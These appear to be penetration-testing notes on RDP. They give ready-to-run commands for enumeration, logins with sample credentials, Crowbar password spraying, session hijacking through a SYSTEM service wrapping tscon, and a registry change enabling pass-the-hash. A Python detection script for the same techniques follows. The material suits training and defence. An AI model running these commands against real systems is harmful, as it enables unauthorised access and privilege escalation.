#rdp #remoteDesktop #port `3389`

```shell
nmap -sV -sC 10.129.201.248 -p3389 --script rdp*
```

```shell
xfreerdp /v:<target-IP> /u:<username> /p:<password>
```

```shell
# Installation and Configuration
sudo cpan

# RDP Security Check
git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
./rdp-sec-check.pl 10.129.201.248

# Initiate an RDP session
xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248
```

```shell
rdesktop -u admin -p password123 192.168.2.143
```

![[Miscellaneous File Transfers#RDP]]

## Password Spraying

### Crowbar

```shell
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
```

## RDP Session Hijacking

```powershell
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
```

If we have local administrator privileges, we can use several methods to obtain `SYSTEM` privileges, such as [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) or [Mimikatz](https://github.com/gentilkiwi/mimikatz). A simple trick is to create a Windows service that, by default, will run as `Local System` and will execute any binary with `SYSTEM` privileges. We will use the [Microsoft sc.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create) binary. First, we specify the service name (`sessionhijack`) and the `binpath`, which is the command we want to execute. Once we run the following command, a service named `sessionhijack` will be created.

```powershell
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0"
```

```powershell
net start sessionhijack
```

## Adding the DisableRestrictedAdmin Registry Key

```powershell
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```
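Each of the three techniques above (the Crowbar spray, the `sessionhijack` service wrapping `tscon`, and the `DisableRestrictedAdmin` change) leaves a distinct trace in Windows event logs. The block below is an added example written for this page, not code from the notes or from any of the tools they reference: it runs three detection rules over a handful of constructed JSON-lines events. The event field names (`TargetUserName`, `IpAddress`, `ImagePath`, `ObjectValueName`, `NewValue`) are the EventData names from the Security and System logs, but how a given forwarder flattens them, and the spray threshold of five accounts in five minutes, are assumptions to tune against your own SIEM. Note that with NLA enabled, failed RDP logons may surface as `LogonType` 3 rather than 10, and `4657` only appears if object-access auditing with a SACL on the `Lsa` key is configured.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (JSON lines, one Windows event per line).
# 4625 = failed logon, 7045 = service installed, 4657 = registry value changed.
# Field names are the EventData names; the flattening is an assumption.
SAMPLE_EVENTS = r"""
{"ts": "2024-05-01T10:00:01", "id": 4625, "LogonType": 10, "TargetUserName": "alice", "IpAddress": "192.168.220.200"}
{"ts": "2024-05-01T10:00:02", "id": 4625, "LogonType": 10, "TargetUserName": "bob", "IpAddress": "192.168.220.200"}
{"ts": "2024-05-01T10:00:03", "id": 4625, "LogonType": 10, "TargetUserName": "carol", "IpAddress": "192.168.220.200"}
{"ts": "2024-05-01T10:00:04", "id": 4625, "LogonType": 10, "TargetUserName": "dave", "IpAddress": "192.168.220.200"}
{"ts": "2024-05-01T10:00:05", "id": 4625, "LogonType": 10, "TargetUserName": "erin", "IpAddress": "192.168.220.200"}
{"ts": "2024-05-01T10:00:06", "id": 4625, "LogonType": 10, "TargetUserName": "frank", "IpAddress": "192.168.220.200"}
{"ts": "2024-05-01T10:07:00", "id": 4625, "LogonType": 10, "TargetUserName": "alice", "IpAddress": "10.0.0.5"}
{"ts": "2024-05-01T10:07:30", "id": 4625, "LogonType": 10, "TargetUserName": "alice", "IpAddress": "10.0.0.5"}
{"ts": "2024-05-01T10:15:00", "id": 7045, "ServiceName": "sessionhijack", "ImagePath": "cmd.exe /k tscon 1 /dest:rdp-tcp#0"}
{"ts": "2024-05-01T10:15:30", "id": 7045, "ServiceName": "UpdateSvc", "ImagePath": "svchost.exe -k netsvcs"}
{"ts": "2024-05-01T10:16:00", "id": 4657, "ObjectName": "HKLM\\System\\CurrentControlSet\\Control\\Lsa", "ObjectValueName": "DisableRestrictedAdmin", "NewValue": "0"}
{"ts": "2024-05-01T10:16:10", "id": 4657, "ObjectName": "HKLM\\System\\CurrentControlSet\\Control\\Lsa", "ObjectValueName": "LimitBlankPasswordUse", "NewValue": "1"}
"""


def parse_events(text):
    """Parse JSON-lines events into dicts with a datetime timestamp."""
    events = []
    for line in text.strip().splitlines():
        e = json.loads(line)
        e["ts"] = datetime.fromisoformat(e["ts"])
        events.append(e)
    return events


def detect_rdp_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Source IPs whose failed RemoteInteractive (type 10) logons hit at
    least `min_accounts` distinct accounts inside a sliding `window`.
    One user failing twice from one host (a typo) does not trigger."""
    by_src = defaultdict(list)
    for e in events:
        if e.get("id") == 4625 and e.get("LogonType") == 10:
            by_src[e["IpAddress"]].append((e["ts"], e["TargetUserName"]))
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (t0, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - t0 <= window}
            if len(users) >= min_accounts:
                hits[src] = sorted(users)
                break
    return hits


def detect_tscon_service(events):
    """Service installs (7045) whose ImagePath invokes tscon: a service
    running as LocalSystem has no legitimate reason to reconnect sessions."""
    return [(e["ServiceName"], e["ImagePath"]) for e in events
            if e.get("id") == 7045 and "tscon" in e.get("ImagePath", "").lower()]


def detect_restricted_admin_change(events):
    """Registry writes (4657) that set DisableRestrictedAdmin to 0, which
    enables Restricted Admin mode and with it pass-the-hash over RDP."""
    return [(e["ObjectName"], e["NewValue"]) for e in events
            if e.get("id") == 4657
            and e.get("ObjectValueName") == "DisableRestrictedAdmin"
            and str(e.get("NewValue")) == "0"]


def run_all(text=SAMPLE_EVENTS):
    events = parse_events(text)
    return {
        "spray": detect_rdp_spray(events),
        "tscon_service": detect_tscon_service(events),
        "restricted_admin": detect_restricted_admin_change(events),
    }


if __name__ == "__main__":
    for rule, result in run_all().items():
        print(f"{rule}: {result}")
```

Each rule returns its findings rather than printing them, so the same functions can be wired into a scheduled job or a unit test. The spray rule keys on distinct target accounts per source rather than raw failure counts, which is what separates a one-password-many-users spray from an ordinary lockout.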